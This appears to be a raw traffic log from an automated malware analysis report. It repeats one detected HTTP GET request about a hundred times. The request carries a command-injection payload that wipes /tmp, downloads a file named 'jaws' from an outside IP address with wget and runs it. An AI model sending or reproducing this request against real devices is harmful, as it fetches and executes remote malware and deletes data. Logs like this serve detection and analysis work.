      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+199.195.250.211/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
